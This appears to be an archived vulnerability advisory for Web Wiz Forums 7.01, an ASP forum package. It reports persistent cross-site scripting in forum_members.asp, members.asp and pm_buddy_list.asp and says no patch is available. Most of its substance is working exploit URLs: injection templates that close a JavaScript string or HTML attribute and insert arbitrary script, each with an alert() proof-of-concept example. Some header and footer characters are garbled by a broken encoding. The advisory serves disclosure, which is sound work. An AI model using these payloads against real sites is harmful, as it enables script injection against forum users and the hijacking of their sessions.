Visit our newest sister site!
Hundreds of free aircraft flight manuals
Civilian • Historical • Military • Declassified • FREE!


TUCoPS :: Web BBS :: etc :: bt1310.txt

Web Wiz Forums ver. 7.01





Informations :
같같같같같같
Language : ASP
Bugged Version : Web Wiz Forums ver. 7.01 (and less ?)
Patched version : none
Website : http://www.webwizforums.com
Problems : Permanent XSS

Objects :
같같같
- forum_members.asp
- members.asp

- pm_buddy_list.asp

Exploits :
같같같같
http://[TARGET]/forum_members.asp?find=%22;}[CODE];function%20x(){v%20=%22

Example: http://[TARGET]/forum_members.asp?find=%22;}ALERT('XSS atack by [HEX] (c) [CSL]');function%20x(){v%20=%22

http://[TARGET]/members.asp?SF=%22;}[CODE]function%20x(){v%20=%22

Example: http://[TARGET]/members.asp?SF=%22;}ALERT('XSS atack by [HEX] (c) [CSL]');function%20x(){v%20=%22

http://[TARGET]/pm_buddy_list.asp?name=A&desc=B%22%3E[CODE]%3Ca%20s=%22&code=1

Example: http://[TARGET]/pm_buddy_list.asp?name=A&desc=B%22%3E<SCRIPT>ALERT('XSS atack by [HEX] (c) [CSL]');</SCRIPT>%3Ca%20s=%22&code=1

Patch/More Details :
같같같같같같같같같
Waiting for the patch at http://www.webwizforums.com...


[ Local time 2:30    | 퇸泣  麟鮑 岫泣 鄭言閃... ]
[ Copyright by [HEX] | mailto:hex@hex.net.ru ]


TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH